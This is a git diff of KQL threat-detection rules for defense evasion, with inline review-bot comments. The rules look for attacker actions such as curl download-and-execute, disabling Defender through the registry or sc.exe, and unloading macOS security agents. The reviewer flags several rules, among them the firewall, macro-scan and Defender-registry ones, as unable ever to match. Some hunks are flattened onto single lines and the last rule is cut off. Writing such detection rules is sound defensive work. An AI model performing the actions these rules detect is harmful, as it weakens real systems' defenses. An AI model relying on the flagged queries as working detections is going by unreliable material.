+// Level: high
+// Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o" and ProcessCommandLine contains "&") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql b/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql
index 875b8de9..d4771fca 100644
--- a/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql
+++ b/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql
@@ -1,10 +1,10 @@
-// Title: Custom File Open Handler Executes PowerShell
-// Author: CD_R0M_
-// Date: 2022-06-11
-// Level: high
-// Description: Detects the abuse of custom file open handler, executing powershell
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202
-
-DeviceRegistryEvents
+// Title: Custom File Open Handler Executes PowerShell
+// Author: CD_R0M_
+// Date: 2022-06-11
+// Level: high
+// Description: Detects the abuse of custom file open handler, executing powershell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceRegistryEvents
 | where (RegistryValueData contains "powershell" and RegistryValueData contains "-command") and RegistryKey endswith "shell\\open\\command*"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql b/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql
index 8285cc90..354f3cb0 100644
--- a/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql
+++ b/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql
@@ -1,12 +1,12 @@
-// Title: Decode Base64 Encoded Text
-// Author: Daniil Yugoslavskiy, oscd.community
-// Date: 2020-10-19
-// Level: low
-// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027
-// False Positives:
-// - Legitimate activities
-
-DeviceProcessEvents
+// Title: Decode Base64 Encoded Text
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-d" and FolderPath endswith "/base64"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql b/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql
index 305525e0..3de0b28d 100644
--- a/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql
+++ b/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql
@@ -1,12 +1,12 @@
-// Title: Decode Base64 Encoded Text -MacOs
-// Author: Daniil Yugoslavskiy, oscd.community
-// Date: 2020-10-19
-// Level: low
-// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027
-// False Positives:
-// - Legitimate activities
-
-DeviceProcessEvents
+// Title: Decode Base64 Encoded Text -MacOs
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "-d" and FolderPath =~ "/usr/bin/base64"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql b/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql
index 7598c0bf..4aefa0d1 100644
--- a/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql
+++ b/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql
@@ -1,12 +1,12 @@
-// Title: Delete Defender Scan ShellEx Context Menu Registry Key
-// Author: Matt Anderson (Huntress)
-// Date: 2025-07-11
-// Level: medium
-// Description: Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Unlikely as this weakens defenses and normally would not be done even if using another AV.
-
-DeviceRegistryEvents
+// Title: Delete Defender Scan ShellEx Context Menu Registry Key
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-11
+// Level: medium
+// Description: Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Unlikely as this weakens defenses and normally would not be done even if using another AV.
+
+DeviceRegistryEvents
 | where RegistryKey contains "shellex\\ContextMenuHandlers\\EPP" and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql b/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql
index 6901b5b2..5f66dc20 100644
--- a/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql
+++ b/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql
@@ -1,12 +1,12 @@
-// Title: DeviceCredentialDeployment Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-19
-// Level: medium
-// Description: Detects the execution of DeviceCredentialDeployment to hide a process from view.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: DeviceCredentialDeployment Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects the execution of DeviceCredentialDeployment to hide a process from view.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\DeviceCredentialDeployment.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql b/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql
index f4b9513a..db3e6a16 100644
--- a/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql
+++ b/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql
@@ -1,12 +1,12 @@
-// Title: Devtoolslauncher.exe Executes Specified Binary
-// Author: Beyu Denis, oscd.community (rule), @_felamos (idea)
-// Date: 2019-10-12
-// Level: high
-// Description: The Devtoolslauncher.exe executes other binary
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate use of devtoolslauncher.exe by legitimate user
-
-DeviceProcessEvents
+// Title: Devtoolslauncher.exe Executes Specified Binary
+// Author: Beyu Denis, oscd.community (rule), @_felamos (idea)
+// Date: 2019-10-12
+// Level: high
+// Description: The Devtoolslauncher.exe executes other binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate use of devtoolslauncher.exe by legitimate user
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "LaunchForDeploy" and FolderPath endswith "\\devtoolslauncher.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql b/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql
index c691ea5e..3a11d65f 100644
--- a/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql
+++ b/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql
@@ -1,10 +1,10 @@
-// Title: Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE
-// Author: Greg (rule)
-// Date: 2022-06-17
-// Level: high
-// Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1202, cve.2022-30190
-
-DeviceImageLoadEvents
+// Title: Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE
+// Author: Greg (rule)
+// Date: 2022-06-17
+// Level: high
+// Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202, cve.2022-30190
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\sdiageng.dll" and InitiatingProcessFolderPath endswith "\\msdt.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql b/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql
index d3c7427f..95270396 100644
--- a/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql
+++ b/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql
@@ -1,13 +1,13 @@
-// Title: Directory Removal Via Rmdir
-// Author: frack113
-// Date: 2022-01-15
-// Level: low
-// Description: Detects execution of the builtin "rmdir" command in order to delete directories.
-// Adversaries may delete files left behind by the actions of their intrusion activity.
-// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
-// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.004
-
-DeviceProcessEvents
+// Title: Directory Removal Via Rmdir
+// Author: frack113
+// Date: 2022-01-15
+// Level: low
+// Description: Detects execution of the builtin "rmdir" command in order to delete directories.
+// Adversaries may delete files left behind by the actions of their intrusion activity.
+// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
+// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "/q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and ProcessCommandLine contains "rmdir"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql b/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql
index 10ed4f45..e2918b7f 100644
--- a/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql
+++ b/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql 
@@ -1,15 +1,15 @@
-// Title: Directory Service Restore Mode(DSRM) Registry Value Tampering
-// Author: Nischal Khadgi
-// Date: 2024-07-11
-// Level: high
-// Description: Detects changes to "DsrmAdminLogonBehavior" registry value.
-// During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.
-// Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory.
-// If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM.
-// If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped.
-// If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.credential-access, attack.persistence, attack.t1556
-
-DeviceRegistryEvents
+// Title: Directory Service Restore Mode(DSRM) Registry Value Tampering
+// Author: Nischal Khadgi
+// Date: 2024-07-11
+// Level: high
+// Description: Detects changes to "DsrmAdminLogonBehavior" registry value.
+// During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.
+// Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory.
+// If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM.
+// If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped.
+// If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.persistence, attack.t1556
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Control\\Lsa\\DsrmAdminLogonBehavior" and (not(RegistryValueData =~ "DWORD (0x00000000)"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql b/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql
index acdb950c..5c10c66e 100644
--- a/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql
+++ b/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql
@@ -1,10 +1,10 @@
-// Title: Disable Administrative Share Creation at Startup
-// Author: frack113
-// Date: 2022-01-16
-// Level: medium
-// Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.005
-
-DeviceRegistryEvents
+// Title: Disable Administrative Share Creation at Startup
+// Author: frack113
+// Date: 2022-01-16
+// Level: medium
+// Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.005
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Services\\LanmanServer\\Parameters*" and (RegistryKey endswith "\\AutoShareWks" or RegistryKey endswith "\\AutoShareServer")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql b/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql
index 98c891e0..ce615daf 100644
--- a/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql
+++ b/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql
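Review bot: The context line `| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Services\\LanmanServer\\Parameters*" and (RegistryKey endswith "\\AutoShareWks" or ...)` can never be satisfied: `endswith` compares the literal `*`, and no key can end in both `Parameters*` and `\\AutoShareWks`, so this rule is dead on the new side. The hunk only removes and re-adds the header lines with identical text (presumably a line-ending change), so the conversion artefact survives; the same `endswith "...*"` pattern also makes the key-prefix tests unsatisfiable in disable_macro_runtime_scan_scope, disable_microsoft_defender_firewall_via_registry, disable_windows_defender_functionalities_via_registry_keys and disable_windows_event_logging_via_registry, the last two of which are the broadest Defender/event-log tampering rules in the set. The trailing wildcard should become a prefix or substring test, e.g. `RegistryKey contains "\\Services\\LanmanServer\\Parameters\\"`, and since these files look generated the fix belongs in the converter so regenerated rules stay consistent.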
@@ -1,10 +1,10 @@
-// Title: Disable Exploit Guard Network Protection on Windows Defender
-// Author: Austin Songer @austinsonger
-// Date: 2021-08-04
-// Level: medium
-// Description: Detects disabling Windows Defender Exploit Guard Network Protection
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-
-DeviceRegistryEvents
+// Title: Disable Exploit Guard Network Protection on Windows Defender
+// Author: Austin Songer @austinsonger
+// Date: 2021-08-04
+// Level: medium
+// Description: Detects disabling Windows Defender Exploit Guard Network Protection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (00000001)" and RegistryKey contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql b/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql
index 557ba58a..bb8b3f33 100644
--- a/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql
+++ b/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql
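Review bot: `RegistryValueData =~ "DWORD (00000001)"` in the context line drops the `0x` prefix that every other registry rule in this set uses (`DWORD (0x00000001)`), so the two spellings cannot both match the same telemetry and one of them is silently wrong. Beyond the inconsistency, I believe DeviceRegistryEvents reports DWORD data as a plain numeric string rather than the Sysmon-style `DWORD (0x…)` text these Sigma sources were written against; that is worth confirming against live events, because if so every `RegistryValueData =~ "DWORD (...)"` comparison across these hunks is a silent detection gap rather than a working rule. The hunk itself only re-adds the header lines, so neither point is addressed by the commit.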
@@ -1,10 +1,10 @@
-// Title: Disable Macro Runtime Scan Scope
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-25
-// Level: high
-// Description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceRegistryEvents
+// Title: Disable Macro Runtime Scan Scope
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-25
+// Level: high
+// Description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE*" and RegistryKey endswith "\\Microsoft\\Office*" and RegistryKey contains "\\Common\\Security") and RegistryKey endswith "\\MacroRuntimeScanScope"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql b/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql
index 13fdd341..4f2a5274 100644
--- a/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql
+++ b/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql
@@ -1,10 +1,10 @@
-// Title: Disable Microsoft Defender Firewall via Registry
-// Author: frack113
-// Date: 2022-01-09
-// Level: medium
-// Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.004
-
-DeviceRegistryEvents
+// Title: Disable Microsoft Defender Firewall via Registry
+// Author: frack113
+// Date: 2022-01-09
+// Level: medium
+// Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Services\\SharedAccess\\Parameters\\FirewallPolicy*" and RegistryKey endswith "\\EnableFirewall"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/disable_or_stop_services.kql b/KQL/rules/Defense Evasion/disable_or_stop_services.kql
index 05d94219..3cf1fbe5 100644
--- a/KQL/rules/Defense Evasion/disable_or_stop_services.kql
+++ b/KQL/rules/Defense Evasion/disable_or_stop_services.kql
@@ -1,12 +1,12 @@
-// Title: Disable Or Stop Services
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-15
-// Level: medium
-// Description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Disable Or Stop Services
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-15
+// Level: medium
+// Description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "stop" or ProcessCommandLine contains "disable") and (FolderPath endswith "/service" or FolderPath endswith "/systemctl" or FolderPath endswith "/chkconfig")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql b/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql
index 287d5e1d..776e4c3e 100644
--- a/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql
+++ b/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql
@@ -1,12 +1,12 @@
-// Title: Disable Privacy Settings Experience in Registry
-// Author: frack113
-// Date: 2022-10-02
-// Level: medium
-// Description: Detects registry modifications that disable Privacy Settings Experience
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Legitimate admin script
-
-DeviceRegistryEvents
+// Title: Disable Privacy Settings Experience in Registry
+// Author: frack113
+// Date: 2022-10-02
+// Level: medium
+// Description: Detects registry modifications that disable Privacy Settings Experience
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate admin script
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE\\DisablePrivacyExperience"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql b/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql
index 139d72bb..7ea03a49 100644
--- a/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql
+++ b/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql
@@ -1,10 +1,10 @@
-// Title: Disable PUA Protection on Windows Defender
-// Author: Austin Songer @austinsonger
-// Date: 2021-08-04
-// Level: high
-// Description: Detects disabling Windows Defender PUA protection
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-
-DeviceRegistryEvents
+// Title: Disable PUA Protection on Windows Defender
+// Author: Austin Songer @austinsonger
+// Date: 2021-08-04
+// Level: high
+// Description: Detects disabling Windows Defender PUA protection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Policies\\Microsoft\\Windows Defender\\PUAProtection"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/disable_security_tools.kql b/KQL/rules/Defense Evasion/disable_security_tools.kql
index a37b7aed..8fed30a3 100644
--- a/KQL/rules/Defense Evasion/disable_security_tools.kql
+++ b/KQL/rules/Defense Evasion/disable_security_tools.kql
@@ -1,12 +1,12 @@ -// Title: Disable Security Tools -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2020-10-19 -// Level: medium -// Description: Detects disabling security tools -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate activities - -DeviceProcessEvents +// Title: Disable Security Tools +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: medium +// Description: Detects disabling security tools +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents | where ((ProcessCommandLine contains "unload" and FolderPath =~ "/bin/launchctl") and (ProcessCommandLine contains "com.objective-see.lulu.plist" or ProcessCommandLine contains "com.objective-see.blockblock.plist" or ProcessCommandLine contains "com.google.santad.plist" or ProcessCommandLine contains "com.carbonblack.defense.daemon.plist" or ProcessCommandLine contains "com.carbonblack.daemon.plist" or ProcessCommandLine contains "at.obdev.littlesnitchd.plist" or ProcessCommandLine contains "com.tenablesecurity.nessusagent.plist" or ProcessCommandLine contains "com.opendns.osx.RoamingClientConfigUpdater.plist" or ProcessCommandLine contains "com.crowdstrike.falcond.plist" or ProcessCommandLine contains "com.crowdstrike.userdaemon.plist" or ProcessCommandLine contains "osquery" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "td-agent")) or (ProcessCommandLine contains "disable" and FolderPath =~ "/usr/sbin/spctl") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql b/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql index 06ad0973..32689112 100644 
--- a/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql
+++ b/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql
@@ -1,10 +1,10 @@
-// Title: Disable Tamper Protection on Windows Defender
-// Author: Austin Songer @austinsonger
-// Date: 2021-08-04
-// Level: medium
-// Description: Detects disabling Windows Defender Tamper Protection
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-
-DeviceRegistryEvents
+// Title: Disable Tamper Protection on Windows Defender
+// Author: Austin Songer @austinsonger
+// Date: 2021-08-04
+// Level: medium
+// Description: Detects disabling Windows Defender Tamper Protection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
 | where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows Defender\\Features\\TamperProtection") and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql b/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql
index 751507f4..ae00516d 100644
--- a/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql
+++ b/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql
@@ -1,12 +1,12 @@ -// Title: Disable Windows Defender AV Security Monitoring -// Author: ok @securonix invrep-de, oscd.community, frack113 -// Date: 2020-10-12 -// Level: high -// Description: Detects attackers attempting to disable Windows Defender using Powershell -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice. - -DeviceProcessEvents +// Title: Disable Windows Defender AV Security Monitoring +// Author: ok @securonix invrep-de, oscd.community, frack113 +// Date: 2020-10-12 +// Level: high +// Description: Detects attackers attempting to disable Windows Defender using Powershell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice. + +DeviceProcessEvents | where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "-DisableBehaviorMonitoring $true" or ProcessCommandLine contains "-DisableRuntimeMonitoring $true")) or ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "WinDefend") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "WinDefend" and ProcessCommandLine contains "start=disabled") or (ProcessCommandLine contains "stop" and ProcessCommandLine contains "WinDefend"))) \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql b/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql
index b11de363..7b55237f 100644
--- a/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql
+++ b/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql
@@ -1,13 +1,13 @@ -// Title: Disable Windows Defender Functionalities Via Registry Keys -// Author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel -// Date: 2022-08-01 -// Level: high -// Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Administrator actions via the Windows Defender interface -// - Third party Antivirus - -DeviceRegistryEvents +// Title: Disable Windows Defender Functionalities Via Registry Keys +// Author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel +// Date: 2022-08-01 +// Level: high +// Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrator actions via the Windows Defender interface +// - Third party Antivirus + +DeviceRegistryEvents | where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows Defender*" or RegistryKey endswith 